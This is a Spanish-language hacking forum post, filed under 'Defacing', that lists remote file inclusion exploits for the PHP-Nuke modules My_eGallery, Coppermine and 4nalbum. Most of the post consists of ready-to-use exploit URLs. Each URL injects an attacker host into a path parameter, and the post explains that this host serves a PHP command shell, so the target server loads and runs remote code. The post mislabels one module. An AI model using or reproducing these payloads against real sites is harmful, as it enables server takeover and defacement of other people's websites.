hackcrack24
¿Quieres reaccionar a este mensaje? Regístrate en el foro con unos pocos clics o inicia sesión para continuar.


Nueva pagina hackcrack24: www.hackcrack24.com.ar
 
ÍndiceÍndice  PortalPortal  Últimas imágenesÚltimas imágenes  BuscarBuscar  RegistrarseRegistrarse  ConectarseConectarse  

hackcrack24 :: Informatica :: Defacing
 

 Remote File Inclusion en módulos Php

Ir abajo 
AutorMensaje
hacker-24
Admintrador



Cantidad de envíos : 45
Fecha de inscripción : 12/05/2008

Remote File Inclusion en módulos Php Empty
MensajeTema: Remote File Inclusion en módulos Php   Remote File Inclusion en módulos Php EmptySáb Jul 26, 2008 2:43 am
Remote File Inclusion en módulos Php

* www.digital-system.org - csuser.x[at]gmail[dot]com

########################################################################################



RFI en módulos Php


Estos son unos bugs también un poco antiguos del conocido portal de noticias php-nuke.
Los errores de remote file inclusion se encuentran en los módulos:

- "My_eGallery"
- "Coppermine"
- "4nalbum"

Y los respectivos exploits son:

*********************

Para el "4nalbum"

http://victimima/modules/My_eGallery/public/displaycategory.php?basepath=http://www.attacker.com

*********************

Para el "coppermine"

/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.attacker.com

*********************

Y para el "4nalbum"

http://victimima/modules/4nalbum/public/displaycategory.php?basepath=http://www.attacker.com

*********************

En donde "http://www.attacker.com" corresponde a la url de una shell de comandos cmd en php.




hacker-24
Volver arriba Ir abajo
https://hackcrack24.activo.mx
 
Remote File Inclusion en módulos Php
Volver arriba 
Página 1 de 1.
 Temas similares
-
» Remote File Inclusion

Permisos de este foro:No puedes responder a temas en este foro.
hackcrack24 :: Informatica :: Defacing-
Cambiar a: